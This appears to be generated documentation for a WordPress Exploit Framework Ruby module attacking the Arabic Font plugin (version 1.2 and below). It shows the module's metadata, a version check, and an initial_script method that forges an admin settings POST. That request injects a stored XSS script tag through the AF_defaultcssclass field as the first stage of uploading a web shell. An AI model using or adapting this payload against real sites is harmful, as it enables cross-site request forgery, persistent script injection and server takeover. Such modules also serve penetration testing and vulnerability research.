class Wpxf::Exploit::ArabicFontCsrfStoredXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StagedReflectedXss::new
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Arabic Font <= 1.2 CSRF Stored XSS Shell Upload', author: [ 'rastating' # Discovery + WPXF module ], references: [ ['WPVDB', '8868'], ['URL', 'https://www.rastating.com/arabic-font-1-2-csrf-stored-xss'] ], date: 'Jul 18 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 22 def check check_plugin_version_from_readme('arabic-font', '1.2.1') end
initial_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload.rb, line 26 def initial_script create_basic_post_script( normalize_uri(wordpress_url_admin, 'admin.php?page=arabic-font%2Finc%2Finit.php'), 'save1' => 'Save changes', 'AF_fontfamily' => 'JF Flat Jozoor', 'AF_fontsize' => '18', 'AF_lineheight' => '45', 'AF_textalign' => 'Center', 'AF_defaultcssclass' => ".arab\\\"><script>#{xss_ascii_encoded_include_script}<\\/script><input+type=\\\"hidden\\\"+value=\\\"", 'AF_customcss' => '', 'action' => 'save' ) end